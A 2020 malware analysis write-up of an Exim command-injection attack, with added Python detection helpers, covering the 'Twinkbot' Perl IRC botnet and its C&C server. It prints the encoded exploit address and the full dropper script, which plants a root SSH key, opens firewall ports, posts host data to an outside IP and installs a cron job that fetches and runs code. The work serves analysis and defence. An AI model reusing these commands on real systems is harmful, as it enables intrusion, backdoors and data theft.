
Malware analysis

Initial infection

It started this morning. I received a mail from my mail server saying that it couldn't deliver an email. It looked like a normal email, but the recipient was what caught my attention: the mail address contained a command injection. After some searching on the internet I ended up at what is probably an old vulnerability in Exim that makes this possible. But let's take a look at the mail address first.

<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2045.148.10.84\x2fss\x20-Osxs\x3bchmod\x20\x2bx\x20sxs\x3b.\x2fsxs\x22}}@gnr01.servers.sciuro.org>

I replaced each "\x" with "%" so I could run it through a URL decoder, changed a few characters, and ended up with the following command. We have a C&C server: 45.148.10.84.

/bin/sh -c "wget 45.148.10.84/ss -Osxs;chmod +x sxs;./sxs"
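As an added example (not part of the original write-up), a small Python decoder for addresses like this one: it expands the \xNN and \t escapes the way Exim's string expansion does, pulls the command out of ${run{...}}, and splits the `sh -c` payload into its individual steps, so the same check can be run over a mail log during triage. The sample address is the one quoted above; the function names are my own.

```python
import re
import shlex

# Constructed from the recipient address quoted above (sample input for the parser).
SAMPLE_RECIPIENT = (
    r"root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2045.148.10.84\x2fss\x20-Osxs"
    r"\x3bchmod\x20\x2bx\x20sxs\x3b.\x2fsxs\x22}}@gnr01.servers.sciuro.org"
)

# Exim string expansion accepts \xNN, \t, \n and \r escapes, which lets the payload
# avoid literal spaces, quotes and slashes in the local part of the address.
_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\[tnr]")
_SIMPLE = {"\\t": "\t", "\\n": "\n", "\\r": "\r"}
_RUN = re.compile(r"\$\{run\{(.*?)\}\}", re.DOTALL)


def decode_exim_escapes(s: str) -> str:
    """Expand the backslash escapes the same way Exim's string expansion would."""
    return _ESCAPE.sub(
        lambda m: chr(int(m.group(1), 16)) if m.group(1) else _SIMPLE[m.group(0)], s
    )


def extract_run_command(recipient: str):
    """Return the decoded ${run{...}} payload from an address, or None if absent."""
    m = _RUN.search(recipient)
    return decode_exim_escapes(m.group(1)) if m else None


def shell_steps(command: str):
    """Split a `sh -c "..."` payload into the individual ';'-separated commands."""
    argv = shlex.split(command)          # tabs count as whitespace, like in the shell
    if len(argv) >= 3 and argv[1] == "-c":
        return [step.strip() for step in argv[2].split(";") if step.strip()]
    return [command]


def is_injected_recipient(recipient: str) -> bool:
    """Triage check for mail logs: a legitimate local part never contains '${'."""
    return "${" in recipient.split("@", 1)[0]


if __name__ == "__main__":
    cmd = extract_run_command(SAMPLE_RECIPIENT)
    print(cmd)
    for step in shell_steps(cmd):
        print("  ->", step)
```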

Initial malware

The ss executable contains the following code:

#!/bin/bash
exists=$(grep -c "^jkl:" /etc/passwd)
if [ $exists -eq 0 ]; then
chattr -isa /root/.ssh/authorized_keys
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtI3JzaABDotq1IL3m3KCpwMdGCY+Jr5CGbnznw4QPvVh139jplKrTxm7/3bLdfiLXtkmZfQBiWykH1zi0boA4Tdpw2VJAP9cJL7aru3yX6Zp9Ipo8BdwHHx/KCvLeT9zXosdFCGMyrLZySvhLs3ndqcKOLnQiEAwctaMQxH6hyuRo7Ao5xHTQuYHPVLjNQcZ4as2lFmSEHciPaRda7qgOapWXJdFscwiCyfjxoXOvhRLIb9zVuyvYIc+/X3lufaBrr5G7ElnEfV9/82D9GEOfIXXmLpbSmk5jnu66AXPk4KepTzFx3orvQA7Vk84YsWQDxcyiw78nCvICk1S30YtJ root@' >/root/.ssh/authorized_keys
/usr/sbin/sshd -p 322
/sbin/iptables -I OUTPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I INPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
/sbin/iptables-save >/dev/null 2>&1
/usr/sbin/iptables -I OUTPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
/usr/sbin/iptables -I INPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
/usr/sbin/iptables-save >/dev/null 2>&1
data2=`netstat -natp |grep sshd|base64`
wget -q --post-data "DATA=dGlua2QK&DATA2=$data2" 45.148.10.84/.z/p.php -O /dev/null
cd /tmp
echo 'cd /tmp;wget 45.148.10.84/r.png;perl r.png;rm -fr r.png' > twink
echo 'crontab -l|grep -v twink > /tmp/mycron;crontab /tmp/mycron;rm -fr /tmp/twink' >> twink
echo '* * * * * /tmp/twink' >mycron
crontab -l >> mycron
chmod +x /tmp/twink
crontab mycron;rm -fr mycron
else
exit
fi

This script does the following:

  1. Checks whether the user "jkl" exists. If so, it stops executing.
  2. Adds a public SSH key to the root user.
  3. Starts an SSH server listening on port 322.
  4. Opens the firewall for incoming and outgoing connections on port 322 and saves the rules so they survive a reboot.
  5. Lists the current listening ports of the SSH server and sends them in a POST request back to the C&C server.
  6. Downloads the file r.png, runs it through perl and saves it as the file twink.
  7. Puts the downloaded script in the crontab and runs it every minute.
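An added example, not from the write-up: Python triage checks for the artefacts the steps above leave on a host. Each function takes the text of one artefact (a crontab dump, authorized_keys, netstat output, the cron wrapper) so it can be pointed at a live system or at files copied off a disk image; the sample inputs are constructed to look like what the dropper produces, and the function names are my own.

```python
import re

# Constructed artefacts as they would look after the ss dropper ran
# (sample input, not captured from a real system).
SAMPLE_CRONTAB = "* * * * * /tmp/twink\n0 3 * * * /usr/local/bin/backup.sh\n"
SAMPLE_AUTHORIZED_KEYS = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/constructed+key/== root@\n"
SAMPLE_NETSTAT = (
    "tcp  0  0 0.0.0.0:22   0.0.0.0:*  LISTEN  812/sshd\n"
    "tcp  0  0 0.0.0.0:322  0.0.0.0:*  LISTEN  2044/sshd\n"
)
SAMPLE_TWINK = "cd /tmp;wget 45.148.10.84/r.png;perl r.png;rm -fr r.png\n"


def crontab_runs_tmp_script(crontab):
    """Cron lines that run something out of /tmp every minute (the persistence step)."""
    hits = []
    for line in crontab.splitlines():
        fields = line.split(None, 5)
        if len(fields) == 6 and fields[:5] == ["*"] * 5 and fields[5].startswith("/tmp/"):
            hits.append(line)
    return hits


def keys_with_empty_host_comment(authorized_keys):
    """Keys whose comment is a bare 'user@' (the dropper's key ends in 'root@')."""
    return [l for l in authorized_keys.splitlines() if re.match(r"^ssh-\S+ \S+ \S+@$", l)]


def sshd_on_nonstandard_ports(netstat, expected=(22,)):
    """Ports other than the expected ones on which an sshd process is listening."""
    ports = []
    for line in netstat.splitlines():
        m = re.search(r"[\d.:]*:(\d+)\s+\S+\s+LISTEN\s+\d+/sshd", line)
        if m and int(m.group(1)) not in expected:
            ports.append(int(m.group(1)))
    return ports


def downloader_wrapper_iocs(script):
    """URLs fetched and scripts handed to an interpreter by a cron wrapper like /tmp/twink."""
    urls = re.findall(r"(?:wget|curl)\s+(?:-\S+\s+)*([^\s;&|]+)", script)
    interpreters = re.findall(r"\b(perl|python\d?)\s+([^\s;&|]+)", script)
    return {"urls": urls, "interpreters": interpreters}
```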

Agent

The twink executable is a Perl IRC bot. You can find the code here. It's a really old script, but it still works.

  • It chooses a process name from a list and renames its own process to it, to hide its presence.
  • It prepares the connection to the C&C server over IRC:
    • It takes a random IRC client version string; most of them are from the mIRC IRC client.
    • It chooses a random username.
    • It chooses a random realname.
    • It chooses a random nickname.
  • It tries to connect to the IRC server on 45.148.10.84 on port 21, 8080 or 9999.
  • It listens for commands from the user evil, with the hostmask mfu.txt, in the channel #root.
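An added example (my own code, not from the write-up) showing how the process-name trick above can be spotted on a Linux host: rewriting $0 changes /proc/<pid>/cmdline and comm, but /proc/<pid>/exe still points at the Perl binary, so an interpreter whose argv[0] and comm claim to be something else is worth a look, and more so when it holds a connection to one of the bot's ports. The process and connection snapshots are constructed; read_procs() builds the same records from a live /proc.

```python
import os

# Constructed snapshot of /proc/<pid>/{exe,comm,cmdline} (not from the analysed host):
# the Perl bot has rewritten $0 so it looks like a kernel thread and a system daemon.
SAMPLE_PROCS = [
    {"pid": 812,  "exe": "/usr/sbin/sshd", "comm": "sshd",        "cmdline": "/usr/sbin/sshd -D"},
    {"pid": 1190, "exe": "/usr/bin/perl",  "comm": "perl",        "cmdline": "/usr/bin/perl /usr/bin/spamd"},
    {"pid": 3188, "exe": "/usr/bin/perl",  "comm": "kworker/0:1", "cmdline": "[kworker/0:1]"},
    {"pid": 3201, "exe": "/usr/bin/perl",  "comm": "crond",       "cmdline": "/usr/sbin/crond -n"},
]
# Constructed established TCP connections for the same host: (pid, remote_ip, remote_port).
SAMPLE_CONNS = [(812, "203.0.113.7", 51820), (1190, "198.51.100.9", 25),
                (3188, "45.148.10.84", 8080), (3201, "45.148.10.84", 9999)]

INTERPRETERS = {"perl", "python", "python2", "python3", "ruby"}
BOT_PORTS = {21, 8080, 9999}   # the ports the bot tries, as listed above


def masqueraded_interpreters(procs):
    """pids whose binary is a script interpreter but whose argv[0] and comm claim otherwise."""
    hits = []
    for p in procs:
        exe = os.path.basename(p["exe"]).replace(" (deleted)", "")
        if exe not in INTERPRETERS:
            continue
        argv = p["cmdline"].split()
        argv0 = os.path.basename(argv[0].strip("[]")) if argv else ""
        if exe not in argv0 and exe not in p["comm"]:
            hits.append(p["pid"])
    return hits


def bot_connections(conns, suspicious_pids, ports=BOT_PORTS):
    """Connections from flagged processes to the ports the IRC bot uses for C&C."""
    return [c for c in conns if c[0] in suspicious_pids and c[2] in ports]


def read_procs():
    """Build the same records from a live Linux /proc (skips processes we cannot read)."""
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            exe = os.readlink(f"/proc/{pid}/exe")
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            continue
        procs.append({"pid": int(pid), "exe": exe, "comm": comm, "cmdline": cmdline})
    return procs
```

On a live host, `bot_connections` would be fed from `ss -ntp` output (or /proc/net/tcp) rather than the constructed list.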

IRC C&C server

There is an IRC server on the IP 45.148.10.84. Let's connect to it and see how it works:

[09:08:24] Connecting to [45.148.10.84] on port 8080
[09:08:24] Connection to host established
[09:08:25] -irc.evilcode.php-   *** Looking up your hostname...
[09:08:25] -irc.evilcode.php-   *** Couldn't resolve your hostname; using your IP address instead
[09:08:25] Welcome to the Don`t Use This ircd IRC Network XXXXX!XXXXX@XXX.XXX.XXX.XXX
[09:08:25] Your host is irc.evilcode.php, running version Unreal3.2.10.6
[09:08:25] This server was created Sat Mar 7 2020 at 10:20:59 UTC
[09:08:25] irc.evilcode.php Unreal3.2.10.6 iowghraAsORTVSxNCWqBzvdHtGpI lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ
[09:08:25] AWAYLEN=307 CHANLIMIT=#:10 CHANNELLEN=32 CMDS=KNOCK,MAP,DCCALLOW,USERIP,STARTTLS HCN KICKLEN=307 MAXCHANNELS=10 MAXLIST=b:60,e:60,I:60 NAMESX NICKLEN=30 SAFELIST TOPICLEN=307 UHNAMES are supported by this server
[09:08:25] CASEMAPPING=ascii CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ CHANTYPES=# ELIST=MNUCT EXTBAN=~,qjncrRa MAXTARGETS=20 MODES=12 NETWORK=Don`t-Use-This-ircd PREFIX=(qaohv)~&@%+ SILENCE=15 WALLCHOPS WATCH=128 WATCHOPTS=A are supported by this server
[09:08:25] EXCEPTS INVEX STATUSMSG=~&@%+ are supported by this server
[09:08:25] There are 1 users and 9 invisible on 1 servers
[09:08:25] 1 operator(s) online
[09:08:25] 4 channels formed
[09:08:25] I have 10 clients and 0 servers
[09:08:25] Current local users 10, max 232
[09:08:25] Current global users 10, max 232
[09:08:25] Message(422): MOTD File is missing
[09:08:25] XXXXX sets mode +iwx

After connecting, we were automatically joined to the channel #R. Nobody was there except an OP user named evil, with the following whois information.

[09:12:18] evil has userhost fld@mfu.txt and real name “.”
[09:12:18] evil is in @#R 
[09:12:18] evil is connected on irc.evilcode.php (Stay OUT BITCH!)
[09:12:18] evil is a Network Administrator
[09:12:18] evil is available for help.
[09:12:18] evil signed on at 31 March 2020 at 19:47:43 CEST and has been idle for 13 hours, 11 minutes, 35 seconds

This confirms our findings about the C&C control user in the twink.pl script: this is the user that can give commands to the bot. We could also join the channel #root, but that didn't change anything: one OP user and one client user. I took some time to observe, but nothing was happening.

OSINT

IP Information

  Name      Status
  IP Info   Amsterdam, North Holland, Netherlands

Abuse sites

  Name       Status
  NIST       CVE-2019-10149 (https://nvd.nist.gov/vuln/detail/CVE-2019-10149): A flaw was found in Exim versions 4.87 to 4.91.
  AbuseIPDB  100%
  any.run    Non windows

Shodan

  Port      Service        Banner
  22/TCP    SSH            SSH-2.0-OpenSSH_5.3
  80/TCP    Apache 2.2.15  HTTP/1.1 403 Forbidden (full response below)
  5432/TCP  Unreal ircd
  8080/TCP  Unreal ircd
  9999/TCP  Unreal ircd

  Banner on 80/TCP:

  HTTP/1.1 403 Forbidden
  Date: Sun, 29 Mar 2020 01:37:10 GMT
  Server: Apache/2.2.15 (CentOS)
  Accept-Ranges: bytes
  Content-Length: 4961
  Connection: close
  Content-Type: text/html; charset=UTF-8

Pastebin

  Name      Status
  kXFkemhf  First script

Thanks

Research/2020/Twinkbot (last edited 2020-04-04 16:23:26 by Sciuro)